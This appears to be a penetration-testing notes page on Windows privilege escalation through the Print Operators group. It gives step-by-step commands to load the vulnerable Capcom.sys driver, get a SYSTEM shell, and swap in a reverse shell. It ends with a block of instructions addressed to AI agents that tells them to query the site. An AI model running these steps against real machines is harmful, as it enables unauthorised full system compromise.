# Print Operators ## ABOUT **Print Operators** is another highly privileged group, which grants its members the `SeLoadDriverPrivilege`, rights to **manage, create, share, and delete printers** connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down. ## Capcom Driver Abuse The plan is to use **EnableSeLoadDriverPrivilege** script [**\[LINK\]**](https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeLoadDriverPrivilege.cpp) to enable `SeLoadDriverPrivilege.` Then we need to load the **Capcom.sys** [**\[LINK\]**](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) driver, which was used originally as a anti-cheat for Capcom games, but it also have functionality to allow any user to execute shellcode with `SYSTEM` privileges. Then we make a Registry key and edit it for Capcom.sys to be seen. Then we check it with **DriverView** [**\[LINK\]**](http://www.nirsoft.net/utils/driverview.html). After we verified that info, we are using **ExploitCapcom** script [**\[LINK\]**](https://github.com/tandasat/ExploitCapcom) to get SYSTEM shell. **OR** we can change code of **ExploitCapcom** to make a reverse shell for us (if we have no GUI access). #### Check privs ```powershell C:\> whoami /priv ``` #### EnableSeLoadPrivilege ```powershell C:\> .\EnableSeLoadDriverPrivilege.exe ``` #### Add Reference to Driver You need to download Capcom.sys to `C:\temp`. Issue the commands below to add a reference to this driver under our **HKEY\_CURRENT\_USER** tree. ```powershell C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys" C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 ``` #### Verify Driver ```powershell PS C:\> .\DriverView.exe /stext drivers.txt PS C:\> cat drivers.txt | Select-String -pattern Capcom ``` #### Exploiting ```powershell PS C:\> .\ExploitCapcom.exe ``` *** #### Same stuff but automated We can use **EoPLoadDriver** [**\[LINK\]**](https://github.com/umiterkol/EoPLoadDriver_Release/releases) script to automate process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver by using this command. ```powershell C:\> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\temp\Capcom.sys ``` ``` PS C:\> .\ExploitCapcom.exe ``` *** ### NO GUI For that we need to find ExploitCapcom.cpp. change string below and recompile. ```cpp B E F O R E : TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); A F T E R : TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe"); ``` *** ### Cleanup For a little clean up we could just delete registry key we made before. ```powershell C:\> reg delete HKCU\System\CurrentControlSet\Capcom ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/windows/privilege-escalation/built-in-groups/print-operators.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.